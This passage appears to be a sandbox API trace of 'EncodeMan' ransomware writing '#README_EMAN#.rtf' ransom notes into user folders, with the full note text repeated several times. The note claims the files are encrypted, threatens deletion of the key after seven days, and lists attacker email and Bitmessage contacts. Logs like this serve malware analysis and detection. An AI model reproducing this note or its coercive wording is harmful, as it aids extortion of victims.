configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0298.498] WriteFile (in: hFile=0x228, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.499] CloseHandle (hObject=0x228) returned 1 [0298.499] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\#readme_eman#.rtf")) returned 0xffffffff [0298.499] GetLastError () returned 0x2 [0298.499] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0298.500] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.500] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.500] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) 